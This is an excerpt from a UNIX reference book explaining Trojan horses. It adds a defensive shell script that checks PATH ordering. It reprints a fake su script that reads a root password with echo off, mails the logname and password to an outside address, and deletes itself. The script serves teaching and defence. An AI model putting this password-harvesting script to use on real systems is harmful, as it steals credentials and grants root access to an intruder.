Trojan Horses


A Trojan horse is a program that masquerades as another program or, in addition to doing what the genuine program does, performs some other unintended action. Often a Trojan horse masquerades as a commonly used program, such as ls. When a Trojan horse runs, it may send files to the intruder or simply change or erase files.

An example of a Trojan horse has been provided by Morris and Gramp in their article listed at the end of this chapter. Their example is a Trojan horse that masquerades as the su command. The shell script for the Trojan horse is placed in the file su in a directory in the path of the user. The shell script for this Trojan horse is given here:

 stty -echo                           #turn character echoing off
 echo "Password: \c"                  #echo "Password:"
 read X                               #assign input string to variable X
 echo ""                              #begin new line
 stty echo                            #turn character echo back on
 echo $1 $X | mail outside!creep &    #send logname and value of X to outside!creep
 sleep 1                              #wait 1 second
 echo Sorry.                          #echo "Sorry."
 rm su                                #remove the shell script for this program

Suppose that the PATH variable for this user is set so that the current directory precedes the directory containing the genuine su command. The following session takes place when the user runs the su command.

 $ su
 Password: ab2cof1   {entered password is not displayed}
 Sorry.
 $ su
 Password: ab2cof1   {entered password is not displayed}

This session starts with the user typing su, thinking this will run the superuser su command. Instead, the Trojan horse su command runs. The user enters the root password (which is not echoed back). The Trojan horse su command sends the logname and the password to outside!creep, compromising the user’s security. The bogus su command removes itself after mailing the password. The user sees su fail and infers that the password has been mistyped. Then, when the user runs su again, the genuine su program runs and the user can log in as superuser after entering the correct password.

This example shows that you may be vulnerable to a Trojan horse if the shell searches the current directory before searching system directories. Suppose you find this:

 $ echo $PATH
 :/bin:/usr/bin:/fred/bin

With this value for PATH, the current directory (represented by the empty field before the first colon) is the first directory searched by the shell when a command is entered.

On the other hand, if the path is set up this way,

 $ echo $PATH
 /bin:/usr/bin:/home/fred/bin:

the current directory is searched last by the shell when a command is entered.

Consequently, to avoid this type of Trojan horse, set your PATH variable with the empty field last, so that the current directory is searched last after system directories have been searched.
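The PATH check this passage describes, as an added example that is not code from the book: a POSIX sh audit that flags any current-directory entry (an empty field, "." or a relative name) searched before a system directory, and rewrites the value with those entries moved last, as the text recommends. The function names check_path and fix_path are my own.

```shell
# Added example, not code from the book: audit a PATH value for the weakness the
# bogus su script relies on, a current-directory entry searched before system dirs.

# check_path PATHVALUE
# Returns 0 when every current-directory entry comes after the last absolute
# directory (the ordering the text recommends) and 1 otherwise. Fields are
# split by hand because $IFS splitting drops a trailing empty field in some shells.
check_path() {
    rest=$1 pos=0 first_cwd=0 last_abs=0 cwd_entry=''
    while :; do
        case $rest in
            *:*) entry=${rest%%:*}; rest=${rest#*:}; more=1 ;;
            *)   entry=$rest; more=0 ;;
        esac
        pos=$((pos + 1))
        case $entry in
            /*) last_abs=$pos ;;
            *)  if [ "$first_cwd" -eq 0 ]; then first_cwd=$pos; cwd_entry=$entry; fi ;;
        esac
        [ "$more" -eq 1 ] || break
    done
    if [ "$first_cwd" -ne 0 ] && [ "$first_cwd" -lt "$last_abs" ]; then
        [ -n "$cwd_entry" ] || cwd_entry='"" (empty field = current directory)'
        printf 'unsafe: field %d, %s, is searched before a system directory\n' \
            "$first_cwd" "$cwd_entry"
        return 1
    fi
    printf 'ok: no current-directory entry precedes a system directory\n'
}

# fix_path PATHVALUE
# Print PATH with every current-directory entry moved after the absolute ones,
# which is the book's remedy; dropping such entries altogether is stricter.
fix_path() {
    rest=$1 abs='' cwd='' ncwd=0
    while :; do
        case $rest in
            *:*) entry=${rest%%:*}; rest=${rest#*:}; more=1 ;;
            *)   entry=$rest; more=0 ;;
        esac
        case $entry in
            /*) abs="${abs:+$abs:}$entry" ;;
            *)  if [ "$ncwd" -gt 0 ]; then cwd="$cwd:$entry"; else cwd=$entry; fi
                ncwd=$((ncwd + 1)) ;;
        esac
        [ "$more" -eq 1 ] || break
    done
    if [ "$ncwd" -gt 0 ]; then printf '%s\n' "$abs:$cwd"; else printf '%s\n' "$abs"; fi
}
```

Run it against your own shell with `check_path "$PATH"`; the two PATH values shown in the text are the unsafe and safe cases respectively.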




UNIX: The Complete Reference, Second Edition (Complete Reference Series)
ISBN: 0072263369
Year: 2006
Pages: 316
